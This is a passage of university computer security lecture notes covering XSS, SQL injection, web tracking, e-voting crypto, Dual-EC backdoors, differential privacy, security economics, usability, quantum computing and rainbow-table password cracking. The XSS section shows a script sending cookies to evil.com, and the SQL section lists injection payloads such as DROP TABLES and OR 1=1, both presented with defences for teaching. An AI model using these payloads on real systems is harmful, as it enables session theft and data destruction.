naive.com. The naive.com cookie is sent as a parameter in a request to evil.com, and
steal.cgi is executed with the cookie. 

Other CSS risks


A form of “reflection attack” can change the contents of the affected website by manip-
ulating DOM components. For example, an adversary may change form fields.
Defenses

1. Escape output so that in the above example, you would display


$lt;script$gt; post(evil.com, document.cookie) ...
instead of executing a script
2. Sanitize inputs by stripping all tags <>
58 12 Web Security

SQL injection

Example. ’); Drop Tables; --


deletes tables 

Example. SELECT * WHERE user =’’ OR WHERE pwd LIKE ’%’


will select every row and login with their credentials. 

Example. authenticate if username="valid_user" OR 1=1


1 = 1 is always true, will give you data/allow you to login. can then setup
account for bad guy on DB server itself. 

Example. ... UNION SELECT * FROM credit cards


can pull data from other tables 

Defenses

• Input validation
Filter out apostrophes, semicolons, %, hyphens, underscores. Also check data
type (eg. make sure an integer field actually contains an int)
• Whitelisting
Generally better than blacklisting (like above) because
– you might forget to filter out certain characters
– blacklisting could prevent some valid input (like last name O’Brien)
– allowing only a well-definied set of safe values is simpler
• escape quotes
• use prepared statements
• Blind variables:
? placeholders guaranteed to be data and not a control sequence
13 Web Privacy 59

13 Web Privacy
Note: see piazza for lecture slides

Third parties

Third parties (ie. not the site you’re visiting), typically invisible, are compiling profiles
of your browsing history. There is an average of 64 tracking mechanisms (visible) on a
top 50 website, and possibly more invisible ones!
Why tracking?
Behavioral targeting: Send info to ad networks so that user interests are targeted.(Online
advertising is a huge and complicated industry)
Trackers include cookies, javascript, webbugs (1px gifs), where a third party domain is
getting your information.
The market for lemons
George Akerlof, 1971
”Why do people still visit websites that collect too much data?”
1. buyers/users can’t tell apart good and bad products
2. sellers/service providers lose incentive to provide quality (in the case of the in-
ternet, privacy)
3. the bad crowds out the good since bad products are more profitable

Issues with tracking

• intellectual privacy
• behavioral targeting
• price discrimination
• NSA eavesdropping!

Aliasing
If you visit hi5.com with subdomain ad.hi5.com but DNS redirects to ad.yieldmanager.com.
Your browser is tricked since this works even if you block 3rd party cookies.
60 13 Web Privacy

Tagging

Placing data in your browser


These include etags, cookies, content cache, browsing history, window.name, HTTP
STS, etc. With HTTP STS in particular, it can be exploited to tag your browser.

Definition. A server can set a flag in a user’s browser that says that a certain site
can only be accessed securely, through https 

HTTP STS tagging exploit


A server can set 1 bit per domain in the sense that the “must use https” flag is
either on or off. Now, let’s say that IDs are 32-bit integers. The server can create 32
subdomains and set tracking bits according to the ID by embedding the request to
each subdomain in the page.

Fingerprinting

Observing your browser’s behavior via things like


• user-agent
• HTTP ACCEPT headers
• installed fonts
• cookies enabled y/n?
• screen resolution
If you add/hash together all this information, you can likely get a unique fingerprint
for your browser! ie. Panopticlick.com
Anonymous vs. Pseudoanonymous vs. Identity
Truly anonymous shouldn’t be able to track you under a pseudonym in a different
session. (How the Internet started)

Pseudononymous can tell when same person comes back but don’t know real-life
identity. (Internet post-cookies)

Identity can get back to real-life identity.


13 Web Privacy 61

More ways for websites to get your identity

1. Third party is sometimes a first party: have first party relationship with social
networking sites but they’re also as widgets on other pages
Example: Facebook’s Like button – even if you don’t click it, Facebook knows
you were on that page
2. Leakage of identifiers:
GET http://ad.doubleclick.net/adj/...
Referer: http://submit.SPORTS.com/[email protected]
Cookie: id=35c192bcfe0000b1...

Identity has been compromised now and in the future


3. Third party buys your identity: free iPod scam passing your email to first party
site
Security bugs:
• http://google.com/profiles/me redirects to
http://google.com/profiles/randomwalker

In firefox, can put the url in a script tag, JavaScript throws error which includes
the url, giving randomwalker or other identity just from visiting this random page

Mozilla’s solution: only tell original, not redirected URL


• Google spreadsheets: people don’t necessarily understand can be public

Can specify all in URL in search to get public spreadsheets

Can embed invisible Google spreadsheet and look at “Viewing now” on another
machine– how to tell which of these users to serve what to? Use lots of different
spreadsheets. Assign users to a subset of 10 spreadsheets, and then chance of
overlap pretty low.

Google fixed by showing user as Anonymous when on a public spreadsheet even


when logged in, revealing identity only if explicitly shared with that user (and
the user accepted).
62 13 Web Privacy

How security bugs contribute to online tracking

This entire section from 2012


• History sniffing and privacy:
CSS :visited property; how can the web page figure out the color? Check in
JavaScript
– getComputedStyle()
– cache timing: on page, try to download something as embedded; if visited
before, faster due to caching
– server hit: based on if browser downloads image or not
• Identity sniffing:
– All social networking sites have groups that users can join
– Users typically join multiple groups, some of which are public
– Group affiliations act as fingerprint
– Predictable group-specific URLs exist
Look through memebers of groups and see who matches in all the groups the user
has joined
Fix as browser: ensure that a site can’t see what color a link is by keeping track
of who (browser’s rendering component vs programmatic component) is making
the query
Fix as social network: make the URLs not predictable
• One-click fraud: Display IP address and approximate location, so user assumes
the site knows who you are
What if the website actually has your identity and makes a credible threat?
• Not a bug:
Facebook’s instant personalization: Facebook tells partner sites who you are

Defenses

1. Referer blocking
Two drawbacks: (1) many sites check these for CSFR defense. Blocking all referer
headers will break websites.
13 Web Privacy 63

2. Third-party cookie blocking


Relatively little breakage, but doesn’t prevent fingerprinting.
Safari’s cookie blocking policy: It blocks third party cookies unless user is submit-
ting a form, or browser already has cookie from the same party (eg. a facebook
“like” button still works).
Google ad network tried getting around this by using invisible forms
3. “Do not track” option in browsers
4. HTTP request blocking
Compile and maintain a list of known trackers based on domain names and
regexes. The user installs a browser extension (like adblock plus), which down-
loads the above list and blocks requests to objects on the list.
Drawbacks: False positives/negatives; need to trust the list.
64 14 Electronic voting

14 Electronic voting
Requirements
• only authorized voters can vote
• ≤ 1 ballot per voter
• ballots counted as cast
• secret ballot; ”receipt-free” (cannot prove to 3rd party how you voted)
Logically, this involves two steps: (1) cast ballot into ballot box and (2) tally ballot
box to get result.
Old fashioned paper ballots are cheap to operate, easy to understand, but prob-
lematic if ballot is long/complex. Trickery is possible to: For example, chain voting
is when “goons” fill out a ballot and coerce people to deposit that ballot into the box
and return the blank one to them; repeats. There needs to also be a chain of custody
on the ballot box.

End-to-End (E2E) crypto voting

Example. Benaloh

1. voter encrypts ballot, casts ciphertext ballot


2. system publishes the ciphertext (CT) ballot on a public bulletin board
3. at the end of the election, tally the votes.
(1) shuffle and reencrypt CT ballots
CT ballots can’t be matched to originals; trustees collectively decrypt CT ballots
(2) reencrypted CT ballots public, anyone can do tally


The tricky part is reencryption.

Definition. Randomized encryption: One plaintext can go to many possible cipher


texts 

Definition. Rencryption means that given ciphertext C, compute reenc(C) [random-


ized] such that
decrypt(reenc(C)) = decrypt(C)
14 Electronic voting 65

Additionally, (C, reenc(C)) needs to be indistinguishable from (C, reenc(C’)). Essen-


tially, so you can’t figure out which reencryption goes with which of the inputs. 

El Gamal encryption method

• Public parameters g, p (like Diffie-Hellman)


• Private key: x
• Public key: g x mod p
• to encrypt message m
– pick random value r
– compute (g r mod p, mg rx mod p)
– To decrypt with private key? Given (A, B) compute A−x B mod p

Reencryption in El Gamal

• Given (A, B), generate random r’


• Compute
0 0 0 0
(A ∗ g r mod p, B ∗ g r x mod p) = (g r ∗ g r mod p, mg rx g r x mod p)
r+r0 (r+r0 )x
= (g mod p, mg mod p)

• We see that r + r0 can decrypt the message! Also, these two CTs are indistin-
guishable!
How do we know shuffler didn’t cheat?
They start with a ”ballot box” B (sequence of encrypted ballots) and end with B 0 ,
which should be equivalent (reordering of reenc of B)

Proof protocol
• prover produces B1
• B1 should be equivalent to B and B 0
• prover (shuffler) knows the correspondence between B and B1 , and also between
B1 and B 0
Note: if B is not equivalent to B 0 , then B1 can’t be equive to both
66 14 Electronic voting

• challenger flips coin, asks prover to show equivalence between B and B1 , or B 0


and B1
• prover “unwraps” the equivalence
“Look, we can get from B 0 to B by reenc with these random values then reordering
like this”
BUT remember that you can’t show the equivalence between all three because
then the challenger would know a path from B to B 0 and you don’t want that.
Play this proof game k times. If the prover is lying (B not equivalent to B 0 ) he will
get away with it with probability 2−k .
This whole complicated game is designed to convince us that B and B’ are in fact
equivalent without telling us what the exact mapping is between B and B’
This seems like a problem since there exists someone that know the correspondence
between voters and ballots. BUT we can use multiple shuffling steps so that we only
need one honest shuffler to maintain the secret ballot
Upshot: can know 1-1 correspondence between voters and published plaintext ballots,
but not what the correspondence is
A lurking attack What if the voter remembers the random r used to encrypt their
ballot? The voter can prove how they voted by revealing r.

enc ballot = (g r mod p, mg rx mod p)

Fix? Introduce a trusted voting machine that the voter cannot manipulate; it encrypts
ballot and refuses to reveal r. But yet another problem: how do you know voting
machine protects integrity and confidentiality of ballot?

In summary

PAPER ELECTRONIC
counting: slow, expensive counting: fast, cheap
voter sees record directly voter does not see record directly
main threat: tampering afterwards main threat: tampering beforehand
PAPER + ELECTRONIC RECORDS: method of choice
Example: optical scan voting. Voter fills out paper ballot, feeds ballot not scanner,
scanner records electronic record, paper ballot feeds into ballot box
HYBRID COUNT
• count electronic records
14 Electronic voting 67

• statistical audit for consistency of the paper records with the electronic records
• for sample of ballots, compare by hand
68 15 Backdoors in crypto standards

15 Backdoors in crypto standards


Note: see piazza for lecture slides
USA used navajo as a code during WWII
• couldn’t get an accurate phonetic rendering of the code
• provided authentication because people can’t replicate the tonal language easily

Obvious weaknesses vs. back doors


OBVIOUS WEAKNESS
• everyone knows it and can see it
• eg. reducing the key size to make brute force attacks easier

BACK DOOR
• presence is not obvious
• keyed backdoors vs. unkeyed backdoors
KEYED BACKDOORS: need a secret master key to access back door
UNKEYED BACKDOORS: not obvious, but just hoping that someone doesn’t
notice; like a hidden door in real like

Data Encryption Standard (DES)

(1) introducing a stronger encryption standard would make US communications more


secure (2) but would also allow enemies to find/use this stronger encryption
Three organizations working on DES IBM, NIST, NSA DES is a Fiestel-like
procedure
• had S-boxes with constants (discovered differential crytpanalysis, S-boxes are
resistant, but didn’t want people to know about differential cryptanalysis)
• key length = 56 (NSA wanted to use 48, IBM wanted to use 64, they compromised
at 56)
• a number of iterations
People were concerned about a builtin backdoor. In reality, NSA tried to weaken the
algorithm (smaller key size) but installed no backdoor.
15 Backdoors in crypto standards 69

DUAL-EC

Definition. Relies on elliptic curves (EC)


Points are solutions to equations of the form

y2 mod p = (x3 + ax + b) mod p

You “add” two EC points to get another EC point. Multiplying point by an int is the
same as adding it to itself repeatedly. 

How it works
• Pick random, non-secret EC points P, Q
• start with secret integer s0
• to update and generate new output
si = x(si−1 P ) where x(.) extracts x coord
output T (x(si Q)) where T(.) truncates, discarding 16 high order
bits
Problem 1
Adversary can create keyed backdoor if they can choose P and Q (see slides)
So then naturally the NSA chose P and Q.
How to generate P and Q?
• choose random seed
• use a one-way algorithm
• get P and Q
But what if adversary chooses the seed?
It should be okay as long as one-way algorithm is good, and the adversary can’t
understand the relationship between P and Q

Problem 2 Output bits are easily distinguished from random. NSA argued against
fixing this (a vulnerability)
(It’s overwhelmingly likely that NSA created a keyed backdoor into this standard by
choosing P and Q)
What happened SSL/TLS are exploitable in practice. NIST’s errors? Not insisting
on fixing vulnerabilities, resulting in a loss of trust in NIST.
The end-user was more vulnerable to NSA due to keyed backdoor and more vulnerable
to others due to the bias (unkeyed backdoor)
Net effect: semi-keyed backdoor
70 15 Backdoors in crypto standards

Digital Signature standard (DSS)

There are a lot of known insecure curves, and some curves that are probably secure,
but no one can prove it. Let’s also say that some adversary can break a fraction f of
the believed-good curves.

How do we choose a curve when the standard writer might be an adversary?


• standard writer chooses a curve (never secure)
• choose randomly (secure with Pr = 1 − f )
• one-way algorithm with adversary choice; Pr = (1 − f )k

Backdoor-proof standardization

• Transparency
discussions on the record, rationale for decisions published
• Discretion is a problem! It gives adversary latitude.
eg. choice of technical approach, choice of mathematical structure, choice of
constants
• Use competitions, because negotiations in a standards committee is risky.
participants submit completely proposals. One is chosen by a group and the
chosen proposal is adopted as-is or with absolutely clear improvements (this is
how AES was gotten)
Shared trust standards benefit everyone :)
20 Big data and privacy 71

20 Big data and privacy


When you have a big db with data about people, you want to make valid inferences
about the population as a whole, but not valide inferences about individuals.
Approaches
• release summary stats
good privacy if done right because it withholds useful information
• anonymize the data set before release
This is much harder to do right than it sounds because of two problems:
– quasi-identifiers: unique but ”not identifying”, e.g. birthday + zip code +
searches for their own name
– linkage to outside data, e.g. looking at netflix data and looking at IMDB
data to re-identify people
In analyzing big data, we want semantic privacy.

Definition. Given two databases D and D0 , where D0 is D with your data removed,
anything an analyst can learn from D, they can also learn from D0 
Theorem 20.1. Semantic privacy implies that the result of the analysis does not de-
pend on the contents of the dataset.

Definition. A randomized function Q gives -differential privacy (E-DP) if for all


datasets D1 , D2 that differ in the inclusion/exclusion of one element, and for all sets
S, the following is true:

Pr[Q(D1 ) ∈ S] ≤ e · Pr[Q(D2 ) ∈ S]

As  goes to 0, we get stricter about privacy. 

Useful fact: Post processing is safe.

If Q(.) is E-DP, then for all functions g, g(Q(.)) is E-DP.


72 20 Big data and privacy

How to achieve E-DP?

Ans: Add random noise to “true answer”

Example. Counting queries: ‘‘How many items in the DB have the property _____?’’

• Let C = correct answer


• Generate noise from distribution with probability density function (PDF) f (x) =
/2 · e−|x|
• Return C + noise
We can prove this approach is E-DP, where  is a measure of accuracy/privacy. There’s
a tradeoff (as accuracy increases, privacy decreases). 

To make results “non weird” (1) round off numbers to integers, (2) if a result is less
than 0, set it to 0, and (3) if a result is greater than a cap N , set it to N .
What about multiple queries and averaging?
Theorem 20.2. If Q is E1-DP, and Q’ is E2-DP, then (Q(.), Q’(.)) is (E1 + E2)-DP.
(Essentially, you’ve added how non-private the queries are)
The implications? You can give an analyst an “ budget” and let them decide how to
use it.
Generalizing beyond counting queries
If each element of the database can add/subtract at most some number V from the
results of the query, then we can generate noise from this distribution:

f (x) = V /2 ∗ e−V |x|

and the result will be E-DP.

Problems

Collaborative recommendation systems:


“People who bought X also bought Y”
“If you like this you’ll also like that”

Example. Artificial example: But what if there exists a book that only Ed would
buy?
“People who bought said book also bought Y”
Now you can easily extract information about what else Ed buys. 
20 Big data and privacy 73

Example. Less artificial example: But what if there exists a rare book that you know
Ed bought?
“People who bought said book also bought Y”
Collaborative recommendations are still a clue about what Ed bought. 

How to fix

Look at internals. Let’s say a system computes a covariance matrix (basically a


correlation between all pairs of items) to generate these recommendations. The matrix
could be computed in a DP fashion, adding noise.
Other useful tricks
Machine learning + DP queries: A machine learning algorithm exchanges a bunch of
DP queries and results, and it’ll synthesize a new data set.
74 21 Economics of Security

21 Economics of Security
Does the market produce optimal security? To understand this question, we’ll first
want to to define what ”optimal” means.

Definitions of Efficiency

Definition 1: Strong Pareto Efficiency


• Condition A is Strong-Pareto-Superior to Condition B if everyone likes A better
than B
• ”Available alternative” =⇒ one that is reasonably feasible
• A condition is SP-efficient if: no SP-superior alternative is available
Definition 2: Kaldor-Hicks efficiency
• Condition A is KH-superior to Condition B if there exist zero-sum payments
among people such that A + P is SP-superior to B
• payments need not happen, just a theoretical construct
• A condition is KH-efficient if: no KH-superior alternative is available
Using these definitions, consider a world with perfect information and perfect bargain-
ing. Theorem: Outcomes in this world will be both SP-efficient and KH-efficient.
Proof:
• SP-Efficient: By contradiction. Assume the outcome is not SP-Efficient. Then
an alternative exists that is SP-superior to the existing outcome. However, bar-
gaining would lead to the adoption of this superior outcome.
• KH-Efficient: By contradiction. Assume the outcome is not KH-Efficient. Then
there is an alternative A and a set of payments P such that A + P is SP-superior
to the existing outcome. Then the outcome isn’t SP-Efficient (as proved above).
Therefore, if we observed market failures, they must result from a breakdown in either
perfect information or perfect bargaining.

Market Failures

Market failure #1: Negative Externalities


• If my machine is compromised, some harm falls on me, and some harm falls
on strangers (e.g. from denial of service attacks or spam launched from my
computer)
21 Economics of Security 75

• In general, users will invest in reducing harm to themselves, but not to strangers
• Outcome is underinvestment in security, since the external harm doesn’t enter
into user’s cost/benefit calculation
• Breakdown in perfect bargaining, since the ”strangers” are unidentified and un-
able to invest to prevent the harm that falls on them
Market failure #2: Asymmetric Information
• Arises when vendors know more than users about the security of their products
• If it is hard for buyers to evaluate the security of products, then they won’t be
able to differentiate between high-quality and low-quality products
• As a result, users won’t pay more for supposedly high-quality products, so pro-
ducers won’t invest to develop more secure products, leading to underinvestment
in security
• Antidotes:
– Warranties: act as a signal of quality to buyers if companies willing to bear
the downside of security breaches
– Seller reputation: companies may be harmed in the long-run by selling poor
quality products due to damaged reputation
– Note: both of these solutions don’t work well for start-ups, since the lifetime
of these companies are short and thus warranties aren’t very valuable and
seller reputation isn’t a large concern
Network Effect:
• Some products tend to become more valuable the more people use it (e.g. search
engines)
• Markets for these products tend to be pushed towards monopoly
• Standardization can lead to positive network effect without monopoly
• Argument: network effect → monoculture
• Example: if all products use the same security protocol, might be easier for bad
guys to break lots of system by exploiting a vulnerability in that standard
• However, there are benefits to having a dominant producer of security:
– There are scale efficiencies in security, since large companies can amortize
investments over a large number of users
– Companies can also internalize some of the security benefits, if users harmed
(as in the Negative Externality scenario) fall within the same user base
76 21 Economics of Security

– Antidotes to asymmetric information are more effective (reputation is more


important to large companies than start-ups)
Race to market:
• Because of the network effect, companies have a strong incentive to gobble up
market share as fast as possible
• Often, minimum viable products tend not to require large investment in security
• Start-ups face decision to invest $1 in security today and receive a pay-off of $N
in the future
• Lead to a ”bolt on security” approach, where security features are added once
product is already being used

Solutions to Market Failures

Large customers tend to be able to protect themselves; for example, they can demand
that certain security features be implemented in a product. But what about individual
users?

Can market structures improve information flow? Insurance companies (i.e. that
offer insurance against security breaches) can aggregate the bargaining power of many
different customers. Certification programs, which would give products/companies cer-
tificates of quality, could lead to the same effect. Presumably, certified companies
would see more demand and be able to charge higher prices for their products. How-
ever, companies are unlikely to pay certification bodies to criticize their software.

Can we change liability rules? An optimal liability rule: costs should be borne by
whoever can best prevent harm.

Case study: ATM Fraud


• In the early days of ATMs, many people would withdraw money and claim they
didn’t to force banks to re-credit their account
• In the US, if there wasn’t conclusive proof, banks bore the cost
• In the UK, if there wasn’t conclusive proof, customers bore the cost
• level of fraud significantly lower in US, since banks had made investments to
gather evidence of withdrawal in order to avoid losses
• Generalizing, this seems like an argument in favor of shifting liability for security
flaws to producers, since they are generally in a better position to identify and
fix errors in software and hardware
21 Economics of Security 77

Some problems with shifting liability:


• It’s hard to attribute blame: e.g. identifying the true source of a denial of service
attack launched from a network of computers in many geographic locations
• It’s hard to measure harm: difficult to isolate the harm caused by a single security
breach
• There’s a substantial cost to adjudication
78 22 Human Factors in Security

22 Human Factors in Security


We often attribute security failures to ”user error.” But why do users make so many
errors? There are several sources:
• Bad UI / Poor User Experience (UX)
• Rational ignorance: sometimes, investing the effort to learn how to use security
software or a protocol outweighs the benefit
• Heuristic decision making
• Cognitive biases
Relying on a ”smart user” has hidden costs. An example is relying on users to detect
”spear-fishing emails” and distinguishing malicious attachments from genuine ones.
The user might then have to contact colleagues to verify legitimate emails, costing
both parties time. Some emails falsely thought to be malicious might never be opened.

A common mistake when designing security software is to ”design for yourself.” There
are many different kinds of users, and their needs will probably vary over time, so
designing software for the use of a knowledgable developer is probably a misguided
approach.

Example: Wifi Encryption

• Everybody recommends encrypting WiFi networks, but a relatively small number


of networks are actually encrypted (e.g. powerless)
• Problem: key distribution
– Key must be known to all devices on the network
– Difficult to make the network open to outsiders
– Even if we allow everyone onto the network, it seems silly not to encrypt
traffic once people are actually connected to the network
• Why don’t people encrypt?
– Bad out-of-box experience (people can’t access internet immediately)
– Some internet-enabled devices don’t have I/O (e.g. thermostat, coffee-
maker)
– The devices need to remember the key over time
– A secret key known to 15,000 people isn’t really a secret
22 Human Factors in Security 79

• How can we fix this?


– Exploit physical proximity (e.g. ”tap to pair device”)
– Physical transfer of key through dongle
– Adopt a ”Trust On First Use” (TOFU) policy, which assumes no imperson-
ation the first time a machine connects
– Warning-based approach: warn administrator when a new party connects
to the network

Case study: Email encryption (”Why Johnny Can’t Encrypt”)

Some researchers presented ”average users” with a PGP mail client, and asked them
to perform tasks that required encryption (e.g. send a secure email to Alice, set up a
new secure communication with Charlie). The goals were to observe a) how they use
it and b) what mistakes they make.

The study revealed that average users experienced LOTS of usability problems and
made LOTS of security errors. Why?
• UI design mistakes (e.g. hard to find something in a dropdown menu)
• Metaphor mismatch
– e.g. RSA key was visualized with a physical key icon
– but a cryptographic key isn’t much like a physical key
– why would a user want to publish their key? (as they do with the public
key) why are there two keys (public and private)?
– one suggestion: ”ciphertext is a locked chest” (not a perfect analogy)
• User has to do lots of work up front, before communicating at all
– have to first generate a key pair
– this is the point in the process where users understand the least, and are
most eager to send a message
This case study raises the question about what role the user should play in a secure
procedure. Should they
• control a mechanism? (e.g. ”block cookies” on a browser)
• use a tool? (e.g. ”clear history” on a browser, which performs many tasks like
clearing cache)
• state a goal?
80 22 Human Factors in Security

The goal for many systems is a ”naturally secure interface.” One example here is the
camera light on a laptop that is intended to light up whenever camera is in use.
• user obtains protection against being secretly recorded
• however, on Macs, this light can be bypassed by re-programming firmware that
links camera and light
• a better solution would be to build in a hardware interlock between camera and
light

Social Barriers to Adoption

Case study: an organization that recruits volunteers to break the law in order to put
political pressure on issues. Organizations like this have a strong incentive to encrypt,
since their threat model includes an adversary (government) with a large amount of
resources.

Why don’t people encrypt more often?


• Stigma attached to use of encryption
– only ”paranoid” people use encryption
• Etiquette of encryption
– reply should be encrypted if and only if original message was encrypted
– seen as impolite to respond to an unencrypted message with an encrypted
message, particularly if replying to a superior
• Encryption is seen as a barrier to recruitment
– the up-front cost of setting up a dedicated email client might discourage
volunteers from participating

Warning messages

Warning messages are often used to preempt security breaches. However, users can
suffer from ”dialogue fatigue” and either click through important warnings or find
workarounds.

Countermeasures:
• Vary design of dialogue
• Make ”No” the default (so user can’t click enter to move through0
22 Human Factors in Security 81

• Delay activation of ”OK” button


• ”Hey, you really need to read this” approach
Lately, designers often choose secure defaults and don’t ask the user for an up-front
choice.

NEAT/SPRUCE Framework

A set of questions created by Microsoft to guide developers:

NEAT: Is your security/privacy UX:


• Necessary? Can you eliminate it or defer user decision?
• Explained? Do you present all info user needs to make decision? Is it SPRUCE?
• Actionable? Is there a set of steps user can follow to make correct decision?
• Tested? Is it NEAT for all scenarios, both benign and malicious?
SPRUCE: Why presenting a choice to user, consider
• Source: say who is asking for decision (which application / component / machine)
• Process: give user actionable steps to a good decision
• Risk: explain what bad thing could happen if user makes a wrong decision
• Unique knowledge: tell user what info they bring to the decision
• Choices: list available options, clearly recommend one
• Evidence: highlight info user should include/exclude in making the decision
82 23 Quantum Computing

23 Quantum Computing

Classical Bits

• Two states, written as |0 > and |1 > (classical 0 and classical 1)


• Can read bit to recover state
• Two single bit logic gates: identity and invert

Quantum Bits (qubits)

By analogy with classical bits:


• State is a linear combination of classical states: x|0 > +y|1 >, such that |x|2 +
|y|2 = 1
• x and y are complex numbers (giving the linear combination 4 degrees of freedom)
• If x and y are restricted to real values, then possible states represented by the
unit circle
• Special measurement operation:
– Only way to read a qubit’s state
– Sets the bit to |0 > with probability |x|2 and |1 > with probability |y|2 , and
returns the result
– ”destroys” information by reducing qubit to a classical state
• operations on a qubit = any operation that preserves the condition that |x|2 +
|y|2 = 1
 
x
• writing a qubit as , a valid operation on a qubit is any unitary matrix M,
   0 y
x x
since M = where |x0 |2 + |y 0 |2 = 1
y y0
!
√1 0
2
• example: R = ”rotates” qubit counterclockwise on the unit circle
0 √12
23 Quantum Computing 83

Tempting (but wrong) view:


It’s tempting to think of a qubit as a classical bit whose state is ”unknown” (i.e. is
|0 > with probability |x|2 and |1 > with probability |y|2 . The R operator above is then
thought of as a ”randomizing” operator. However, applying R(R(|0 >)) gives |1 >
with certainty. This doesn’t seem to consist with the view that R(|0 >) is a ”random”
bit, since applying a randomizing operator to randomness shouldn’t lead to a certain
outcome.

Multi-qubit systems:

• In a classical system with k bits, the possible states of the system are |(every k-bit string) >,
of which there are 2k
k −1
2P
• In a quantum system, the possible states are αi · |si >, where si is the ith
i=0
k −1
2P
k-bit string, such that |αi |2 = 1
i=0

• Measuring the system forces it into classical state |si > with probability |αi |2
• In principle, operations on the multi-qubit system include any unitary matrix
• In practice, we use a few simple gates
• Computation:
– initial state = |(input)00000 > (input is padded with zeros to some fixed
length)
– perform some preprogrammed set of gates
– measure system to produce output
– goal is for the system to collapse to the ”correct” answer with high proba-
bility upon measurement
Can we built a quantum computer? Right now, we can only build small ones, but there
is reason to believe we will be able to construct larger ones in the future.

Advantages of QC

There is a common but wrong view that quantum computers will be able to solve any
problem in NP efficiently (i.e. in polynomial time). The idea here is that you can put
a quantum computer into a state which is a superposition of all the possible solutions,
84 23 Quantum Computing

and then measure to determine the ”correct” answer. In reality, decreasing the coef-
ficients on incorrect answers and increasing the coefficient on correct answer(s) isn’t
always easy.

What we know:
• for general NP hard problems, classical computers require brute force search
(takes O(2n ) time)
• Grover’s algorithm =⇒ quantum computers can solve these problems in O(2n/2 ),
a dramatic improvement but still super-polynomial
• there exist some such problems which quantum computers can solve efficiently
– factoring (via Shor’s algorithm)
– discrete log problem (via a variant of Shor’s algorithm)

Implications for crypto

• in a world with large quantum computers, protocols that rely on the hardness of
factoring and the discrete log problem are useless (including RSA, Diffie-Hellman,
etc)
• most symmetric crypto (e.g. AES) is not breakable (in the domain of Grovers
algorithm)
• Grover’s algorithm implies that we can break AES that uses a 128-bit key in
2128/2 = 26 4 steps
• Solution: double the key size
• are there public key algorithms that are not breakable fast by quantum comput-
ers? probably

Quantum Key Exchange

• Threat model:
– quantum channel between Alice and Bob
– assume there exists an eavesdropper who a) can measure but b) cannot
modify qubits in the channel without measuring
• 1) before sending, Alice flips coin; if heads, apply R to the bit before sending
• 2) when Bob gets a bit, flip coin: if heads, apply R−1 to the bit before measuring
23 Quantum Computing 85

• 3) Alice and Bob publish their coin flips, discard any bits where flips dont match
• 4) Alice picks half of the remaining bits, at random, and Alice and Bob publish
their values for these bits
– if any fail to match, abort the protocol (eavesdropper was measuring)
– otherwise, use the remaining bits as a shared secret
• The adversary has a decision: which bits, if any, should he measure?
• If adversary measures:
– if Alice flipped tails, gets correct value
– if Alice flipped heads, get correct value with probability 50%
– If Alice flipped heads and Bob applied R−1 , then there is a 50% chance
Bob’s bit won’t match Alice’s
– Overall, if the adversary measures, there is a 25% chance that Bob’s bit
won’t match alice’s (chance that Alice flipped heads times chance bit col-
lapsed to the wrong value during adversary’s measurement)
• The adversary might also try to apply R−1 before measuring; in this case, he
runs the risk of disrupting bits that were in the classical state to begin with
• Problem: the adversary needs to guess Alices coin flip to measure the bit without
disturbing it
– if the adversary modifies more than 4 of the check bits, they will get caught
with greater than 50% probability
– if the adversary measures a lot, likely that integrity check will fail
– if the adversary doesnt measure a lot, Alice and Bob will have a larger
shared secret
86 24 Password Cracking

24 Password Cracking

Elementary Methods

First, try to define and reduce the search space for a brute-force search:
• all short strings
• combinations of dictionary words
• dictionary words + common modifications (special characters, exclamation point
at the end)
• leaked passwords from past breaches
• dictionary words and one-character modifications
Properties of brute-force search:
• Time requirement: ∼ |D|, where |D| is the length of the dictionary
• Space: ∼ 1
• Can speed up the process by pre-computing hashes of all possible passwords in
search space:
– Fill hash table: can then find x ∈ D given H(x)
– Time to build: ∼ |D|
– Space: ∼ |D|
– Time to recover: ∼ 1
• What we want: smaller data structure, but still fast lookup =⇒ Rainbow Tables

Rainbow Tables

Define ”reduction functions” R0 , R1 , · · · , Rk−1 . The only requirement of these func-


tions is that they map the output of a hash function to a string in your dictionary.
The functions ”reduce” since the number of hash outputs might be very large (e.g.
2256 ), while the dictionary is generally smaller.

Method: Generate chains


• Start with a0 , a random dictionary word. Then, compute H(a0 ). Next, apply R0
to H(a0 ) to generate the next word, a1 .
24 Password Cracking 87

• Complete chain: a0 →H H(a0 ) →R0 a1 →H · · · →Rk−2 ak−1 →H H(ak−1 ) →Rk−1


ak
• Build chains with a variety of starting values b0 , c0 , etc...
• since the output of a cryptographic hash function is essentially pseudorandom,
so is distribution of words that appear in a chain
• for each chain, remember (a0 , ak ), (b0 , bk ), etc
|D| 2|D|
• there are about ∼ k
chains, so storage requirement is ∼ k

• k is a parameter we can adjust to control by how much we shrink storage


You can use a rainbow table to recover x ∈ D given H(x) efficiently.
• 1) Figure out which chain H(x) appears in
• 2) Walk that chain, we will see x → H(x) in that chain
• to find the chain H(x) is in, guess which position in chain it is
• Step 1: k 2 time
• Step 2: k time

You might also like